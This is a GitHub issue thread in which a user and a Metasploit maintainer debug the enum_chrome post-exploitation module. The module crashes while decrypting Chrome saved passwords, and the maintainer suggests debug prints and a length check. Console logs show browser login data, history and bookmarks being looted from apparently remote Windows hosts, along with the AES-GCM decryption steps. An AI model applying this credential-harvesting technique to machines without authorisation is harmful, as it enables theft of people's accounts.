Open Murph000 opened 2 months ago
Can you modify your /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb
file and change it from:
cipher.iv = enc_data[3..14]
ciphertext = enc_data[15..-17]
cipher.auth_tag = enc_data[-16..]
To:
print_status("enc_data: #{enc_data}")
cipher.iv = enc_data[3..14]
ciphertext = enc_data[15..-17]
cipher.auth_tag = enc_data[-16..]
To get the content of enc_data
?
To my uneducated eye I see no difference
[+] Downloaded Web Data to '/root/.msf4/loot/20240408205508_default_71.226.250.46_chrome.raw.WebD_541215.txt'
[-] Cookies not found
[+] Downloaded History to '/root/.msf4/loot/20240408205509_default_71.226.250.46_chrome.raw.Histo_242454.txt'
[+] Downloaded Login Data to '/root/.msf4/loot/20240408205517_default_71.226.250.46_chrome.raw.Login_819038.txt'
[+] Downloaded Bookmarks to '/root/.msf4/loot/20240408205518_default_71.226.250.46_chrome.raw.Bookm_175064.txt'
[+] Downloaded Preferences to '/root/.msf4/loot/20240408205519_default_71.226.250.46_chrome.raw.Prefe_963829.txt'
[*] Found password encrypted with masterkey
[+] Found masterkey!
[-] Post failed: ArgumentError data must not be empty
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:207:in `update'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:207:in `block (3 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `block (2 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `map!'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `block in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:378:in `block in run'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:375:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:375:in `run'
[*] Post module execution completed
Nothing got printed, did you reload_all or restart msfconsole?
Apologies, forgot to, here is the new output:
[*] Impersonating token: 16308
[*] Running as user 'DESKTOP-7IHT9N8\Rick'...
[*] Extracting data for user 'Rick'...
[+] Downloaded Web Data to '/root/.msf4/loot/20240409190801_default_73.33.253.190_chrome.raw.WebD_912879.txt'
[-] Cookies not found
[+] Downloaded History to '/root/.msf4/loot/20240409190802_default_73.33.253.190_chrome.raw.Histo_393266.txt'
[+] Downloaded Login Data to '/root/.msf4/loot/20240409190809_default_73.33.253.190_chrome.raw.Login_412976.txt'
[+] Downloaded Bookmarks to '/root/.msf4/loot/20240409190810_default_73.33.253.190_chrome.raw.Bookm_315029.txt'
[+] Downloaded Preferences to '/root/.msf4/loot/20240409190810_default_73.33.253.190_chrome.raw.Prefe_486057.txt'
[*] Found password encrypted with masterkey
[+] Found masterkey!
[*] "enc_data: #{enc_data}"
[-] Post failed: ArgumentError data must not be empty
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:208:in `update'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:208:in `block (3 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `block (2 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `map!'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `block in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:379:in `block in run'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:376:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:376:in `run'
[*] Post module execution completed
Something with your copy-pasting went wrong, it should have printed this:
enc_data: [...data...]
And not:
"enc_data: #{enc_data}"
I seem to have pasted the wrong code, try this:
print_status("enc_data: #{enc_data}")
Thank you, apologies for the delay, here is the new output:
[+] Downloaded Web Data to '/root/.msf4/loot/20240411170353_default_71.226.250.46_chrome.raw.WebD_226980.txt'
[-] Cookies not found
[+] Downloaded History to '/root/.msf4/loot/20240411170354_default_71.226.250.46_chrome.raw.Histo_787563.txt'
[+] Downloaded Login Data to '/root/.msf4/loot/20240411170402_default_71.226.250.46_chrome.raw.Login_779870.txt'
[+] Downloaded Bookmarks to '/root/.msf4/loot/20240411170404_default_71.226.250.46_chrome.raw.Bookm_364976.txt'
[+] Downloaded Preferences to '/root/.msf4/loot/20240411170404_default_71.226.250.46_chrome.raw.Prefe_082933.txt'
[*] Found password encrypted with masterkey
[+] Found masterkey!
[*] enc_data: v10???X????W?j???[?N~?e?????Z???E?_
[*] enc_data: v10?*???V?\????c??u^9?7?S?W+N??Nz▒D?
[*] enc_data: v10BLy?Vw?>e0h????h????
%?C?8?z
[*] enc_data: v10??g
?^??Q?~?@?8@??k1?0r?e?7C?X?f
[*] enc_data: v10?Q??g?;?w?f???5?2?c5AK?f9\m??f11?x
[*] enc_data: v10????}??c?\?????????d'pqc
?
[*] enc_data: v10nD??}<??z?T??+2??8?}?5?oS???As??
[*] enc_data: v10????[?z????R?▒??????`Lc;?f????
[*] enc_data: v10 ▒?????????W?yo?.?,?U?5>@\^[{??8
[*] enc_data: v10????G:?Y??q??<?jP&
Ia?%~E:E??
[*] enc_data: v10V?F*?@?????z?o8???J??Em??????
_E?"?LMp???[: v10b?d?_?'7?)??B ?? ?
[*] enc_data: v10???8**~I???=%?lP?f?m?
[-] Post failed: ArgumentError data must not be empty
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:208:in `update'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:208:in `block (3 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `block (2 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `map!'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `block in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:379:in `block in run'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:376:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:376:in `run'
[*] Post module execution completed
It seems like your enc_data
is too short?!
Can you change it to this:
print_status("enc_data len: #{enc_data.length()}")
It returned the length as 31:
[*] Impersonating token: 12460
[*] Running as user 'DESKTOP-7IHT9N8\Rick'...
[*] Extracting data for user 'Rick'...
[+] Downloaded Web Data to '/root/.msf4/loot/20240413172341_default_10.0.0.94_chrome.raw.WebD_404667.txt'
[-] Cookies not found
[+] Downloaded History to '/root/.msf4/loot/20240413172342_default_10.0.0.94_chrome.raw.Histo_683194.txt'
[+] Downloaded Login Data to '/root/.msf4/loot/20240413172348_default_10.0.0.94_chrome.raw.Login_678351.txt'
[+] Downloaded Bookmarks to '/root/.msf4/loot/20240413172349_default_10.0.0.94_chrome.raw.Bookm_560730.txt'
[+] Downloaded Preferences to '/root/.msf4/loot/20240413172350_default_10.0.0.94_chrome.raw.Prefe_189370.txt'
[*] Found password encrypted with masterkey
[+] Found masterkey!
[*] enc_data len: 31
[-] Post failed: ArgumentError data must not be empty
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:208:in `update'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:208:in `block (3 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `block (2 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `map!'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `block in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:379:in `block in run'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:376:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:376:in `run'
[*] Post module execution completed
Yes, 31 is not a "good" number - as the expected minimum value should be at least (X-17-15) where X is 32 as this code:
ciphertext = enc_data[15..-17]
Can be empty, but not nil, such is in the case of 31
, the value becomes "negative", enc_data[15..14]
I am wondering if: https://github.com/agentzex/chrome_v80_password_grabber/blob/master/chrome_v80_password_grabber.py
Also fails in the same spot, as the logic seems similar, though written in a bit of a different way
Decrypting and then removing the trailing bytes
Can you change:
ciphertext = enc_data[15..-17]
To this:
ciphertext = enc_data[15..]
And see what it prints out?
If it prints out a valid password (with some residual characters at the end) then it would seem there is an option to store passwords in a length that is smaller than 32 bytes
It seems that changing ciphertext = enc_data[15..-17]
to ciphertext = enc_data[15..]
is causing a cipher error.
I had it print the length and the enc data, here is the new output:
[*] Found password encrypted with masterkey
[+] Found masterkey!
[*] enc_data: v10???X????W?j???[?N~?e?????Z???E?_
[*] enc_data len: 46
[-] Post failed: OpenSSL::Cipher::CipherError
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:209:in `final'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:209:in `block (3 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:187:in `block (2 levels) in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `map!'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:183:in `block in process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:167:in `process_files'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:380:in `block in run'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:377:in `each'
[-] /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:377:in `run'
[*] Post module execution completed
I don't know what this malformed line (the one that has only 31 bytes in it) means, you can skip it if you wish by doing this:
item[:encrypted_fields].each do |field|
name = res['name_on_card'].nil? ? res['username_value'] : res['name_on_card']
origin = res['label'].nil? ? res['origin_url'] : res['label']
enc_data = res[field]
if enc_data.length < 32
next
end
Hi, I am just about clueless when it comes to ruby, but here is where I used the code you have just provided (lines 204-211), this is what the section of the script looks like:
cipher = OpenSSL::Cipher.new('aes-256-gcm')
cipher.decrypt
cipher.key = masterkey
item[:encrypted_fields].each do |field|
name = res['name_on_card'].nil? ? res['username_value'] : res['name_on_card']
origin = res['label'].nil? ? res['origin_url'] : res['label']
enc_data = res[field]
if enc_data.length < 32
next
end
cipher.iv = enc_data[3..14]
ciphertext = enc_data[15..-17]
cipher.auth_tag = enc_data[-16..]
I assume I'm just improperly using your code, here is what was in the log file:
[04/15/2024 18:56:25] [e(0)] core: /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb failed to load - SyntaxError /usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:216: else without rescue is useless
else
^~~~
/usr/share/metasploit-framework/modules/post/windows/gather/enum_chrome.rb:395: syntax error, unexpected end-of-input, expecting `end'
No need for the else
part
If the if
isn't triggered, the code should flow as it was before, so drop the else
part:
if enc_data.length < 32
next
end
cipher.iv = enc_data[3..14]
ciphertext = enc_data[15..-17]
cipher.auth_tag = enc_data[-16..]
I don't know if it will prevent the syntax error you are seeing, as there is no rspec (unit test) file for this one
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Steps to reproduce
How'd you do it?
Expected behavior
Standard decryption and exporting of password data
Current behavior
Calls error
Metasploit version
Framework: 6.4.1-dev Console : 6.4.1-dev
Console output: